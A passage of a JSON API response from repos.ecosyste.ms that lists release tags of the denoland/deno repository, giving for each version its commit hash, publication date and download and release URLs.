ob_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts